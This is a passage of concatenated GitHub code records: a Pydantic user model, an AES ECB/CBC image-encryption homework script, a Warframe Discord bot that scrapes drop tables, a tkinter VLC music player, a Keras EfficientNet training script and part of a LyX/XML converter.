\"users\"\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"email\": \"user@mail.com\",\n \"username\": \"theusername\",\n \"events\": [],\n }\n }\n\nclass TokenResponse(BaseModel):\n access_token: str\n token_type: str\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlcjFAbWFpbC5jb20iLCJleHBpcmVzIjoxNjk2MTE1NzAwLjMzNzg4MX0.eJyZzDExjS1R4GCOSu5J5JQWgc7yJnisAWoGWY9B3uU\",\n \"token_type\": \"Bearer\",\n \"events\": [],\n }\n }","repo_name":"duvg/planner","sub_path":"models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16615202396","text":"import io\nimport sys\nfrom pathlib import Path\n\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nfrom PIL import Image\n\n\nclass EncryptAES:\n def __init__(self, encrypt_mode):\n self._mode = encrypt_mode\n self._key = Random.new().read(AES.block_size)\n self._iv = self._key\n\n key_path = Path(__file__).parent / 'key.txt'\n with open(key_path, 'wb') as f:\n f.write(self._key)\n\n def encrypt(self, plain_text):\n if self._mode == ECB:\n 
self._ecb_encrypt(plain_text=plain_text)\n        elif self._mode == CBC:\n            self._cbc_encrypt(plain_text=plain_text)\n        elif self._mode == CUSTOM:\n            self._custom_encrypt(plain_text=plain_text)\n\n    def _ecb_encrypt(self, plain_text):\n        count = 0\n        count_newline = 0\n        cipher = AES.new(self._key, AES.MODE_ECB)\n        cipher_text = b''\n\n        # copy out the part that does not need encryption (the three header lines)\n        while count_newline < 3:\n            byte = plain_text[count]\n            count += 1\n            byte = bytes(chr(byte), encoding='utf-8')\n            cipher_text += byte\n\n            if byte == b'\\n':\n                count_newline += 1\n\n        block_index = 0\n\n        # encrypt\n        plain_text = plain_text[count:]\n\n        while len(plain_text) % AES.block_size != 0:\n            plain_text += b'\\x00'\n\n        while block_index < len(plain_text):\n            block = plain_text[block_index: block_index + AES.block_size]\n            cipher_block = cipher.encrypt(block)\n            cipher_text += cipher_block\n\n            block_index += AES.block_size\n\n        self._write_image(cipher_text)\n\n    def _cbc_encrypt(self, plain_text):\n        count = 0\n        count_newline = 0\n        cipher = AES.new(self._key, AES.MODE_ECB)\n        cipher_text = b''\n        prev_ct = self._iv\n\n        # copy out the part that does not need encryption (the three header lines)\n        while count_newline < 3:\n            byte = plain_text[count]\n            count += 1\n            byte = bytes(chr(byte), encoding='utf-8')\n            cipher_text += byte\n\n            if byte == b'\\n':\n                count_newline += 1\n\n        block_index = 0\n\n        # encrypt\n        plain_text = plain_text[count:]\n\n        while len(plain_text) % AES.block_size != 0:\n            plain_text += b'\\x00'\n\n        while block_index < len(plain_text):\n            block = plain_text[block_index: block_index + AES.block_size]\n            final_block = byte_xor(block, prev_ct)\n\n            cipher_block = cipher.encrypt(final_block)\n            prev_ct = cipher_block\n            cipher_text += cipher_block\n\n            block_index += AES.block_size\n\n        self._write_image(cipher_text)\n\n    def _custom_encrypt(self, plain_text):\n        count = 0\n        count_newline = 0\n        cipher = AES.new(self._key, AES.MODE_ECB)\n        cipher_text = b''\n        prev_ct = self._iv\n        # cast key to bin\n        binKey = bin(int.from_bytes(self._key, byteorder=sys.byteorder))[2:]\n\n        # copy out the part that does not need encryption (the three header lines)\n        while count_newline < 3:\n            byte = plain_text[count]\n            count += 1\n            byte = bytes(chr(byte), encoding='utf-8')\n            cipher_text += byte\n\n            if byte == b'\\n':\n                count_newline += 1\n\n        block_index = 0\n\n        # encrypt\n        plain_text = plain_text[count:]\n\n        while len(plain_text) % AES.block_size != 0:\n            plain_text += b'\\x00'\n\n        while block_index < len(plain_text):\n            block = plain_text[block_index: block_index + AES.block_size]\n            final_block = byte_xor(block, prev_ct)\n\n            cipher_block = cipher.encrypt(final_block)\n\n            if(binKey[int((block_index/AES.block_size)%len(binKey))] == '0'):\n                prev_ct = cipher_block\n            else:\n                prev_ct = cipher_block[1:] + b'\\x00'\n\n            cipher_text += cipher_block\n\n            block_index += AES.block_size\n\n        self._write_image(cipher_text)\n\n    @staticmethod\n    def _write_image(cipher_text):\n        ppm_path = Path(__file__).parent / 'result.ppm'\n        with open(ppm_path, \"wb\") as f:\n            f.write(cipher_text)\n\n        ppm_picture = ppm_path\n        output_img = Image.open(ppm_picture)\n\n        result_path = Path(__file__).parent / 'result.png'\n        output_img.save(result_path, 'png')\n\n\ndef byte_xor(ba1, ba2):\n    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])\n\n\nECB = 'ECB'\nCBC = 'CBC'\nCUSTOM = 'CST'\n\n\nif __name__ == '__main__':\n    mode = input('Enter the encryption mode: ')\n\n    path = Path(__file__).parent / 'mypppm.ppm'\n    im = Image.open(path)\n    img_byte_array = io.BytesIO()\n    im.save(img_byte_array, format=im.format)\n    img_byte_array = img_byte_array.getvalue()\n\n    if mode == ECB:\n        encrypt_aes = EncryptAES(encrypt_mode=ECB)\n
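        # The script expects mypppm.ppm next to this file; each run draws a fresh random key (also written to key.txt beside the script) and saves the encrypted picture as result.ppm and result.png.\n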
encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CBC:\n encrypt_aes = EncryptAES(encrypt_mode=CBC)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CUSTOM:\n encrypt_aes = EncryptAES(encrypt_mode=CUSTOM)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n","repo_name":"ImJsaw/Information_Security_Class","sub_path":"Hw3/EncryptAES.py","file_name":"EncryptAES.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38017883261","text":"import discord\r\nimport datetime\r\n\r\nfrom CobraLib import source_html\r\nfrom StorageConfig import Traduction\r\n\r\ndef ressource(args):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n pos = 0\r\n zone = data_html[data_html.find(\"Resource Drops by Resource:\"):data_html.find(\"Sigil Drops by Enemy:\")].lower()\r\n if zone.count(item) != 0:\r\n tab = '**' + zone[zone.find(item + ''):zone.find(\r\n '',\r\n zone.find(item + ''))].replace('', '**\\n__').capitalize().replace(\r\n '', '__\\t\\t\\t__').replace('', '__\\n```diff\\n').replace('',\r\n '\\t').replace(\r\n '', '\\n') + '```'\r\n zone = data_html[data_html.find(\"Missions:\"):data_html.find(\"Relics:\")].lower()\r\n if zone.count(item) != 0:\r\n Mission = '?????????'\r\n Rotation = '????????????'\r\n MissionLimit1 = ''\r\n MissionLimit2 = ''\r\n RotationLimit1 = 'rotation'\r\n RotationLimit2 = ''\r\n for i in range(zone.count(item)): # Rotation B\r\n pos = zone.find(item,\r\n pos + 5) # Mars/Gradivus (Caches)'):zone.find(\r\n RotationLimit2,\r\n zone.rfind(\r\n RotationLimit1,\r\n 0,\r\n pos) + len(\r\n ''))]:\r\n objet = zone[zone.rfind('', 0, pos) + len(\"\"):pos + len(item)] # \r\n chance = zone[zone.find('', pos) + len(\"\"):zone.find('', zone.find('',\r\n pos) + len(\r\n \"\"))] # \r\n tab = tab + objet.capitalize() + '\\t' + chance\r\n else:\r\n Mission = zone[zone.rfind(MissionLimit1, 0, pos) + len(MissionLimit1):zone.find(MissionLimit2,\r\n zone.rfind(\r\n MissionLimit1, 0,\r\n pos) + len(\r\n MissionLimit1))]\r\n if Mission == 'urvival)':\r\n Mission = 'Mercury/Apollodorus (Survival)'\r\n Rotation = zone[\r\n zone.rfind(RotationLimit1, 0, pos) + len(''):zone.find(RotationLimit2,\r\n zone.rfind(\r\n RotationLimit1,\r\n 0, pos) + len(\r\n ''))]\r\n objet = zone[zone.rfind('', 0, pos) + len(\"\"):pos + len(item)] # \r\n chance = zone[zone.find('', pos) + len(\"\"):zone.find('', zone.find('',\r\n pos) + len(\r\n \"\"))] # \r\n if \"rotation\" not in Rotation:\r\n Rotation = \"???\"\r\n tab = tab + '\\n**' + Mission.capitalize() + '**\\n**' + Rotation.capitalize().replace(' b',\r\n ' B').replace(' c',\r\n ' C').replace(\r\n ' a', ' A') + '**\\n' + objet.capitalize() + '\\t' + chance\r\n if len(tab) >= 1750:\r\n return tab[:1900 ].replace('%)', \"%)\\n\") + '\\n```And more...', 'message.author'\r\n if tab == \"\" or item == \"region resource\":\r\n return Traduction.bug(item), 'msg'\r\n else:\r\n return tab.replace('%)', \"%)\\n\"), 'msg'\r\n\r\ndef typeofrelic(rarete, item):\r\n if \"axi\" in item.lower():\r\n if rarete == \"Intact\":\r\n return 'https://vignette.wikia.nocookie.net/warframe/images/0/0e/VoidProjectionsGoldD.png/revision/latest?cb=20160711164509&path-prefix=fr'\r\n if rarete == \"Exceptional\":\r\n return 
'https://vignette.wikia.nocookie.net/warframe/images/3/3c/VoidProjectionsIronA.png/revision/latest?cb=20160903181326&path-prefix=fr'\r\n        if rarete == \"Flawless\":\r\n            return 'https://vignette.wikia.nocookie.net/warframe/images/4/4e/VoidProjectionsIronB.png/revision/latest?cb=20160903181334&path-prefix=fr'\r\n        if rarete == \"Radiant\":\r\n            return 'https://vignette.wikia.nocookie.net/warframe/images/1/1a/VoidProjectionsIronC.png/revision/latest?cb=20160903181342&path-prefix=fr'\r\n        else:\r\n            return 'https://vignette.wikia.nocookie.net/warframe/images/0/0e/VoidProjectionsGoldD.png/revision/latest?cb=20160711164509&path-prefix=fr'\r\n    if \"meso\" in item.lower():\r\n        return 'https://vignette.wikia.nocookie.net/warframe/images/1/12/VoidProjectionsBronzeD.png/revision/latest/scale-to-width-down/199?cb=20160711164431&path-prefix=fr'\r\n    if \"neo\" in item.lower():\r\n        return 'https://vignette.wikia.nocookie.net/warframe/images/c/c5/VoidProjectionsSilverD.png/revision/latest/scale-to-width-down/199?cb=20160711164523&path-prefix=fr'\r\n    else:\r\n        return 'https://vignette.wikia.nocookie.net/warframe/images/a/ae/VoidProjectionsIronD.png/revision/latest/scale-to-width-down/199?cb=20160711164451&path-prefix=fr'\r\n\r\n\r\ndef relicSearch(args, client):\r\n    data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n    item = list(' '.join(args[1:3]).lower())\r\n    item[0] = item[0].upper()\r\n    item[len(item) - 2] = item[len(item) - 2].upper()\r\n    item = \"\".join(item)\r\n    try:\r\n        if args[3] == \"1\":\r\n            rarete = \"Exceptional\"\r\n        elif args[3] == \"2\":\r\n            rarete = \"Flawless\"\r\n        elif args[3] == \"3\":\r\n            rarete = \"Radiant\"\r\n        else:\r\n            rarete = \"Intact\"\r\n    except:\r\n        rarete = \"Intact\"\r\n    limit1 = ''\r\n    tab = data_html[data_html.find(item + \" Relic (\" + rarete + \")\"):data_html.find(limit1, data_html.find(\r\n        item + \" Relic (\" + rarete + \")\"))].replace(\"\", \"\\n**\").replace(\"\", \"** \").replace(\r\n        \"\", \"\\n**\")\r\n    embed = discord.Embed(title=\" Relic \"+item+' '+rarete, description=datetime.datetime.today().strftime(\"%d/%m/%Y\"),\r\n                          color=0x514430)\r\n    embed.set_author(name=client.user.name, icon_url=client.user.avatar_url,\r\n                     url='https://discordbots.org/bot/591950764289818634')\r\n    embed.set_thumbnail(url=typeofrelic(rarete, item))\r\n    pos = 0\r\n    for i in range(0, tab.count(\" (\")):\r\n        pos = tab.find('\\n', pos) + len('\\n')\r\n        Data = tab[tab.find(')', pos) + len(')'):tab.find(')', tab.find(')', pos) + len(')')) + len(')')]\r\n        name = Data[Data.find('**') + len('**'):Data.find('**', Data.find('**') + len('**'))]\r\n        chance = Data[Data.find('** ') + len('** '):]\r\n        if len(name) > 5:\r\n            embed.add_field(name=name, value=chance, inline=True)\r\n    if tab == \"\":\r\n        embed.add_field(name=Traduction.bug(item), value=Traduction.bug(item))\r\n        return embed\r\n    else:\r\n        return embed\r\n\r\ndef MobsModsdrops(args):\r\n    data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n    item = list(' '.join(args[1:]).lower())\r\n    item = \"\".join(item)\r\n    zone = data_html[data_html.find(\"Mod Drops by Enemy:\"):data_html.find(\"Mod Drops by Mod:\")].lower()\r\n    tab = \"**\" + zone[zone.find(item + ''):zone.find(\r\n        '',\r\n        zone.find(item + ''))].replace(\"\", \"\\n\").replace(\"\", \" \").replace(\r\n        \"\", \"\\n\").replace('', \"\\n\").replace(item, item + \"**```fix\").replace(\r\n        \"\\n \", \"\\n\").capitalize() + \"```\"\r\n    if tab == \"**```\":\r\n        return Traduction.bug(item)\r\n    else:\r\n
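        # A non-empty tab means the enemy name was matched in the scraped drop-table HTML, so return the formatted block.\r\n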
return tab\r\n\r\ndef ItemDrops(args):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n zone = data_html[\r\n data_html.find(\"Blueprint/Item Drops by Blueprint/Item:\"):data_html.find(\"Resource Drops by Enemy:\")].lower()\r\n tab = '**' + zone[zone.find(item + ''):zone.find(\r\n '',\r\n zone.find(item + ''))].replace('', '**\\n__').capitalize().replace(\r\n '', '__\\t\\t__').replace('', '__\\n```diff\\n').replace('', '\\t\\t').replace(\r\n '', '\\n') + '```'\r\n if tab == \"**```\" and \"blueprint\" not in item:\r\n args.append(\"blueprint\")\r\n return ItemDrops(args)\r\n elif tab == \"**```\":\r\n return Traduction.bug(item)\r\n else:\r\n return tab\r\n\r\ndef mods(args):\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n modslist = source_html('https://wf.snekw.com/mods-wiki').lower()\r\n if modslist.count(item) == 0:\r\n return Traduction.bug(item)\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n zone = data_html[data_html.find(\"Mod Drops by Mod:\"):data_html.find(\"Blueprint/Item Drops by Enemy:\")].lower()\r\n if zone.count(item) >= 1:\r\n tab = '**' + zone[zone.find(item + ''):zone.find(\r\n '',\r\n zone.find(item + ''))].replace('', '**\\n__').capitalize().replace(\r\n '', '__\\t\\t\\t__').replace('', '__\\n```diff\\n').replace('',\r\n '\\t').replace(\r\n '', '\\n') + '```\\n'\r\n data_html = source_html(\"https://drops.warframestat.us/data/all.json\").lower()\r\n if data_html.count(item) >= 1:\r\n tab = tab + '**' + item.capitalize() + '**\\n'\r\n posData = 0\r\n for i in range(0, data_html.count(item)):\r\n posData = data_html.find(item, posData + len(item))\r\n Objectivename = data_html[\r\n data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'):data_html.find(\r\n '\"', data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'))]\r\n if Objectivename == 'ds':\r\n zoneb = data_html[data_html.rfind(\"}]\", 0, posData):data_html.rfind(\":[{\", 0, posData)]\r\n MissionName = zoneb[zoneb.find('\"') + 1:zoneb.find('\"', zoneb.find('\"') + 2)]\r\n gamemode = zoneb[zoneb.find('{\"gamemode\":\"') + len('{\"gamemode\":\"'):zoneb.find('\"', zoneb.find(\r\n '{\"gamemode\":\"') + len('{\"gamemode\":\" '))]\r\n if MissionName == 'c' or MissionName == 'b' or MissionName == 'a':\r\n MissionName2=data_html[data_html.rfind('\"',0,data_html.rfind('\":{\"ga',0,posData))+1:data_html.rfind('\":{\"ga',0,posData)].capitalize()\r\n gamemode=data_html[data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'):data_html.find('\"',data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'))].capitalize()\r\n MissionName = 'Rotation ' + MissionName\r\n MissionName=MissionName2.capitalize()+'\\n'+MissionName\r\n Objectivename = '\\n**' + MissionName + '** : ' + gamemode.capitalize()\r\n chancedrop = data_html[data_html.find('\"chance\":', posData) + len('\"chance\":'):data_html.find('}',\r\n data_html.find(\r\n '\"chance\":',\r\n posData) + len(\r\n '\"chance\":'))]\r\n tab = tab + Traduction.FindHere() + Objectivename + '\\nDrop Chance: ' + chancedrop + '\\n'\r\n if len(tab) >= 1750:\r\n return tab[:1900 ].replace('%)', \"%)\\n\") + '\\nAnd more...', 'message.author'\r\n if not tab == \"\":\r\n return tab,\"msg\"\r\n else:\r\n return 
Traduction.bug(item),\"msg\"","repo_name":"typlosion14/WarframeBot","sub_path":"resources/official.py","file_name":"official.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"33574452494","text":"from tkinter import *\r\nfrom tkinter import filedialog as fd\r\nimport os\r\nimport vlc\r\nimport random\r\n\r\nInstance = vlc.Instance()\r\nplayer = Instance.media_player_new()\r\n\r\nafter_id = ''\r\n\r\nclass Music():\r\n    song_name = ''\r\n    random_song = False\r\n    ext_list = ['.mp3', '.wav', '.ogg']\r\n    player_volume = 50\r\n\r\n    def change_random(self):\r\n        self.random_song = not self.random_song\r\n        if self.random_song: prevMusicButton['state'] = 'disabled'\r\n        else: prevMusicButton['state'] = 'active'\r\n\r\n    def switch_file(filepath, prev):\r\n        directory = os.path.dirname(filepath)\r\n        filename = os.path.basename(filepath)\r\n        fileList = os.listdir(directory)\r\n        if prev: nextIndex = fileList.index(filename) - 1\r\n        else: nextIndex = fileList.index(filename) + 1\r\n        if nextIndex == len(fileList):\r\n            nextIndex = 0\r\n        nextpath = directory + '/' + fileList[nextIndex]\r\n        return nextpath\r\n    \r\n    def random_file(self, filepath):\r\n        directory = os.path.dirname(filepath)\r\n        filename = os.path.basename(filepath)\r\n        fileList = os.listdir(directory)\r\n        nextIndex = random.randint(0, len(fileList) - 1)\r\n        nextpath = directory + '/' + fileList[nextIndex]\r\n        if nextpath == filepath: self.random_file(self, filepath)\r\n        return nextpath\r\n\r\n    def start_player(self):\r\n        self.stop_player()\r\n\r\n        self.song_name = fd.askopenfilename(title = 'Select music')\r\n        nowPlaying['text'] = os.path.basename(self.song_name)\r\n        Media = Instance.media_new(self.song_name)\r\n        Media.get_mrl()\r\n        player.set_media(Media)\r\n        player.play() \r\n        player.audio_set_volume(self.player_volume) \r\n\r\n    def next_song(self, prev):\r\n        Music.skip_not_music(self, prev)\r\n        nowPlaying['text'] = os.path.basename(self.song_name)\r\n        Media = Instance.media_new(self.song_name)\r\n        Media.get_mrl()\r\n        player.set_media(Media)\r\n        player.play() \r\n        player.audio_set_volume(self.player_volume)\r\n\r\n    def skip_not_music(self, prev):\r\n        if self.random_song:\r\n            self.song_name = self.random_file(self, self.song_name)\r\n        else:\r\n            self.song_name = self.switch_file(self.song_name, prev)\r\n        ext = os.path.splitext(self.song_name)[-1].lower()\r\n        if ext not in self.ext_list:\r\n            self.next_song(self, prev)\r\n    \r\n    def change_volume(self, minus):\r\n        if minus: \r\n            if self.player_volume - 10 >= 0: self.player_volume -= 10\r\n        else: self.player_volume += 10\r\n        volumeLabel['text'] = \"Volume: \" + str(self.player_volume)\r\n        player.audio_set_volume(self.player_volume)\r\n\r\n    def stop_player():\r\n        player.stop()\r\n        nowPlaying[\"text\"] = \"Nothing is playing right now\"\r\n\r\ngui = Tk()\r\ngui.geometry('500x250')\r\ngui.configure(background = '#333333')\r\ngui.resizable(width=True, height=False) \r\n\r\nframe_top = Frame(background = '#111111')\r\nframe_mid = Frame(background = '#555555')\r\n\r\nframe_midtop = Frame(frame_mid, background = '#555555')\r\nframe_midmid = Frame(frame_mid, background = '#555555')\r\nframe_midbot = Frame(frame_mid, background = '#555555')\r\n\r\nstartMusicButton = Button(frame_top, text = \"Play\",\r\n                          highlightthickness = 0, bd = 0,\r\n                          background=\"#111111\",\r\n                          font=('Comic Sans MS', 20),\r\n                          fg = '#EEEEEE',\r\n                          command = lambda: (Music.start_player(Music)))\r\npauseMusicButton = Button(frame_midbot, text = \"▍▍\",\r\n                          highlightthickness = 0, bd = 0,\r\n                          background=\"#555555\",\r\n                          font=20,\r\n                          fg = '#EEEEEE',\r\n                          command = lambda: (player.pause()))\r\nprevMusicButton = Button(frame_midbot, text = \"🡸\",\r\n                         highlightthickness = 0, bd = 0,\r\n                         background=\"#555555\",\r\n                         font = 20,\r\n                         fg = '#EEEEEE',\r\n                         command = lambda: (Music.next_song(Music, True)))\r\nnextMusicButton = Button(frame_midbot, text = \"🡺\",\r\n                         highlightthickness = 0, bd = 0,\r\n                         background=\"#555555\",\r\n                         font = 20,\r\n                         fg = '#EEEEEE',\r\n                         command = lambda: (Music.next_song(Music, False)))\r\nstopMusicButton = Button(frame_top, text = \"Stop\",\r\n                         highlightthickness = 0, bd = 0,\r\n                         background=\"#111111\",\r\n                         font=('Comic Sans MS', 20),\r\n                         fg = '#EEEEEE',\r\n                         command = lambda: (Music.stop_player()))\r\nrandomCheck = Checkbutton(frame_top, text='Shuffle tracks',\r\n                          background = \"#111111\",\r\n                          font=('Comic Sans MS', 10),\r\n                          fg = '#EEEEEE',\r\n                          command = lambda: (Music.change_random(Music)))\r\nvolumeScaleMinus = Button(frame_midmid, text = \"-\",\r\n                          highlightthickness = 0, bd = 0,\r\n                          background=\"#555555\",\r\n                          fg = '#EEEEEE',\r\n                          font = 20,\r\n                          command = lambda: (Music.change_volume(Music, True)))\r\nvolumeScalePlus = Button(frame_midmid, text = \"+\",\r\n                         highlightthickness = 0, bd = 0,\r\n                         background=\"#555555\",\r\n                         font = 20,\r\n                         fg = '#EEEEEE',\r\n                         command = lambda: (Music.change_volume(Music, False)))\r\n\r\nvolumeLabel = Label(frame_midmid, background = \"#555555\", text = 'Volume: 50', font=('Comic Sans MS', 10), fg = '#EEEEEE')\r\nnowPlaying = Label(frame_midtop, background = \"#555555\", text = 'Nothing is playing right now', font=('Comic Sans MS', 10), fg = '#EEEEEE', width = 200)\r\n\r\nframe_top.pack(side = 'top', fill = 'both')\r\nstartMusicButton.pack(side = 'left')\r\nstopMusicButton.pack(side = 'left')\r\nrandomCheck.pack(side = 'left')\r\n\r\nframe_mid.pack(side = 'left')\r\n\r\nframe_midtop.pack(side = 'top')\r\nnowPlaying.pack(side = 'left', fill = 'x')\r\n\r\nframe_midmid.pack(side = 'top')\r\nvolumeScaleMinus.pack(side = 'left')\r\nvolumeLabel.pack(side = 'left')\r\nvolumeScalePlus.pack(side = 'left')\r\n\r\nframe_midbot.pack(side = 'top')\r\npauseMusicButton.pack(side = 'left')\r\nprevMusicButton.pack(side = 'left')\r\nnextMusicButton.pack(side = 'left')\r\n\r\ngui.mainloop()","repo_name":"CharaFour/Dont-open","sub_path":"opmain.py","file_name":"opmain.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"8135969840","text":"import numpy as np\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Input, MaxPooling2D, LeakyReLU, Softmax, GlobalAveragePooling2D, BatchNormalization, Dropout \r\nfrom tensorflow.keras.models import Sequential, Model, load_model, save_model\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport pandas as pd\r\n#1. 
DATA\r\n#.npy Load\r\nx = np.load('../../data/npy/LPD_train_x1.npy', allow_pickle=True)\r\ny = np.load('../../data/npy/LPD_train_y1.npy', allow_pickle=True)\r\ntarget = np.load('../../data/npy/target1.npy', allow_pickle=True)\r\n\r\nfrom tensorflow.keras.applications.efficientnet import preprocess_input\r\nx = preprocess_input(x)\r\ntarget = preprocess_input(target)\r\n\r\n# print(x.shape)\r\n# print(y.shape)\r\n# print(target.shape)\r\n\r\n#generagtor\r\nidg = ImageDataGenerator(\r\n zoom_range = 0.1,\r\n height_shift_range=0.1,\r\n width_shift_range=0.1,\r\n rotation_range=32 \r\n)\r\n\r\nidg2 = ImageDataGenerator()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_val, y_train, y_val = train_test_split(x, y, train_size = 0.9, random_state = 128, shuffle = True)\r\n\r\n#control\r\nimage_size = (128, 128, 3)\r\nbts = 32\r\noptimizer = Adam(learning_rate = 1e-3)\r\n\r\ntrain_generator = idg.flow(x_train, y_train, batch_size = bts, seed=1024)\r\nvalid_generator = idg2.flow(x_val, y_val)\r\ntest_generator = idg2.flow(target)\r\n\r\n#2. MODEL\r\nfrom tensorflow.keras.applications import EfficientNetB5\r\nTF = EfficientNetB5(weights=\"imagenet\", include_top=False, input_shape = image_size) \r\nTF.trainable = True\r\nx = TF.output\r\nx = GlobalAveragePooling2D()(x)\r\nx = Flatten()(x)\r\nx = Dense(2048, activation='relu')(x)\r\noutputs = Dense(1000, activation='softmax')(x)\r\nmodel = Model(inputs = TF.input, outputs = outputs)\r\nmodel.summary()\r\n\r\n#COMPILE \r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\r\nmodel.compile(loss = 'categorical_crossentropy', optimizer = optimizer, metrics = ['acc'])\r\nmc = ModelCheckpoint('C:/data/MC/best_LT_vision2_{epoch:02d}-{val_loss:.4f}.hdf5', save_best_only=True, mode = 'auto')\r\nes = EarlyStopping(monitor='val_loss', patience=5, verbose=1, mode='auto')\r\nrl = ReduceLROnPlateau(monitor='val_loss', factor=0.3, patience=3, verbose=1, mode='auto')\r\nmodel.fit_generator(train_generator, epochs=100, verbose=1, validation_data= valid_generator, callbacks=[es, rl, mc])\r\n\r\nmodel.save('C:/data/h5/LT_vision_model2_3.h5')\r\nmodel.save_weights('C:/data/h5/LT_vision_3.h5')\r\n# model = load_model('C:/data/h5/fish_model2.h5')\r\n# model.load_weights('C:/data/h5/fish_weight.h5')\r\n\r\n#EVAL\r\nloss, acc = model.evaluate(valid_generator)\r\nprint(\"loss : \", loss)\r\nprint(\"acc : \", acc)\r\n\r\nresult = pd.read_csv(\"C:/data/LPD_competition/sample.csv\")\r\n\r\n# prd = model.predict(x_test)\r\n# filenames = xy_test.filenames\r\n# nb_samples = len(filenames)\r\n# print(nb_samples)\r\nprd = model.predict_generator(test_generator, steps=72000)\r\na = pd.DataFrame()\r\nprd = pd.Series(np.argmax(prd,axis=-1))\r\nprd = pd.concat([a,prd],axis=1)\r\nresult.iloc[:,1] = prd.sort_index().values\r\nresult.to_csv('C:/data/LPD_competition/sample_2.csv')","repo_name":"TaeYeon-kim-ai/STUDY_1.py","sub_path":"dacon/lotte_vision_1/LT_model10_Effition_B5.py","file_name":"LT_model10_Effition_B5.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71246478122","text":"#! 
/usr/bin/env python\n\nimport re\nimport sys\n\nimport xml.etree.ElementTree as ET\nimport xml.parsers.expat as expat\n\ndoc = sys.argv[1]\nlang = sys.argv[2]\ninput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'.xml'\noutput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'-back.lyx'\n\nsentence_end_re=re.compile('([!?]|[^.][.]|[\\n])')\nheader = False\ntext = ''\ndef write_sentence(s):\n max_len = 78\n while len(s) > max_len:\n split = s.rfind(' ', 0, max_len)\n if split >= 0:\n output_file.write(s[:split]+'\\n')\n s = s[split:]\n else:\n break\n output_file.write(s.rstrip('\\n')+'\\n')\ndef write_text():\n global text\n if len(text) > 0:\n # split on end of sentences\n splitted = sentence_end_re.split(text.rstrip('\\n'))\n while len(splitted) > 1:\n sentence = splitted[0]+splitted[1]\n write_sentence(sentence)\n splitted = splitted[2:]\n if len(splitted) == 1:\n if splitted[0] != '':\n write_sentence(splitted[0])\n text = ''\ndef comment(data):\n write_text()\n\n output_file.write('#'+data+'\\n')\ndef start_element(name, attrs):\n global header\n write_text()\n\n # special tags\n if name == 'lyx2xml':\n return\n if name == 'empty_line':\n output_file.write('\\n')\n return\n if name == '__param':\n start_tab = attrs.pop('start_tab')\n if start_tab == \"True\":\n output_file.write('\\t')\n value_present = attrs.pop('value_present')\n if value_present == \"True\":\n param = ' '.join([k+' '+v for (k, v) in attrs.items()])\n else:\n param = ' '.join([k for k in attrs.keys()])\n output_file.write(param+'\\n')\n return\n\n # xml-like structure\n if name.startswith('__'):\n if len(attrs) > 0:\n param = ' '.join([k+'=\"'+v+'\"' for (k, v) in attrs.items()])\n output_file.write('<'+name[2:]+' '+param+'>\\n')\n else:\n output_file.write('<'+name[2:]+'>\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = True\n output_file.write('\\\\begin'+name)\n else:\n output_file.write('\\\\'+name)\n if len(attrs) > 0:\n output_file.write(' '+' '.join(attrs.values())+'\\n')\n else:\n output_file.write('\\n')\ndef end_element(name):\n global header\n write_text()\n\n # special tags\n if name == '__param':\n return\n\n # xml-like structure\n if name.startswith('__'):\n if name[2:] not in ('features', 'column'):\n output_file.write('\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = False\n output_file.write('\\\\end'+name+'\\n')\ndef char_data(data):\n global text\n global header\n if header is True:\n output_file.write(data.replace('',''))\n return\n\n if len(text) == 0:\n if data == '\\n':\n return\n text += data.replace('','')\n\nwith open(output_filename, 'w') as output_file:\n p = expat.ParserCreate()\n\n p.CommentHandler = 